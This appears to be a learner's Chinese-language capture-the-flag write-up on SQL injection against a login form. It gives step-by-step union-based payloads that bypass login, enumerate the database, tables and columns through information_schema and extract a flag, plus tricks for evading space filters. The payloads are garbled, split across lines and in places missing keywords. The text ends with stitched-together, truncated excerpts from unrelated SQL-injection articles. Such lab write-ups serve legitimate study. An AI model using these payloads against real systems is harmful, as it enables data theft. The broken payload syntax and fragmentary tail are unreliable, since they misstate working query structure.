第一周學習web,不知道學習筆記寫什麼寫點做題筆記吧。
進來先判斷,這道題考的應該是sql注入,所以先試試用 or 繞過登入邏輯看看成不成功(其實我也只會這一點點)
1' or1=
1;#
其實這裡的;是可以不需要的但我還是打上了。
發現登陸成功了,並且有回顯,所以我們要利用回顯的點去進行注入。
首先是判斷union後應該接幾個查詢。
1' or1=
1union1,
2;#//這個發現它沒有登陸成功,所以接著試三個。
1' or1=
1union1,
2,3;
#//發現登陸成功,並且回顯的點是2。
接著開始用2的位置爆庫名
1' or1=
1union1,
database()
,3;#//發現資料庫名為web2。
接下來爆表。
1' or1=
1union
select
1,group_concat(table_name),3
from information_schema.
tables
where table_schema=「web2」;
#//爆出表名為flag,user。
接著是字段。
1' or1=
1union
select
1,group_concat(column_name),3
from information_schema.
columns
where table_name=「flag」;
#//得到欄位名是flag。
最後是爆值。
1' or1=
1union
select
1,flag,
3from flag;
#
到此,爆出flag。
這也是一道sql注入題和上題不同的是在輸入
1' or1=
1;#
時,會顯示mysql inject error。於是開始乙個乙個排查,發現是過濾了空格。
於是空格有一下幾種代替方式。
/**/,(),teb,兩個空格,`
其他的流程與題二無異。 sql注入除mysql之外 SQL注入的練習
測試sql注入的字元型別 若輸入1時的結果 輸入1 and 1 1時,結果 輸入1 and 1 2時,結果 則為字元型,可對其進行sql注入 確定字元型後,可以對mysql資料庫中的某些資料進行查詢,甚至在許可權較高時可以修改資料庫的內容,以下為讀取資料庫名稱的注入 1 union select 1...
SQL注入1
1 整型引數的判斷 當輸入的引數yy為整型時,通常abc.asp中sql語句原貌大致如下 select from 表名 where 字段 yy,所以可以用以下步驟測試sql注入是否存在。附加乙個單引號 此時abc.asp中的sql語句變成了 select from 表名 where 字段 yy ab...
SQL注入詳解 1
隨著b s 模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫 的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查詢 根據程式返回的結果,獲得...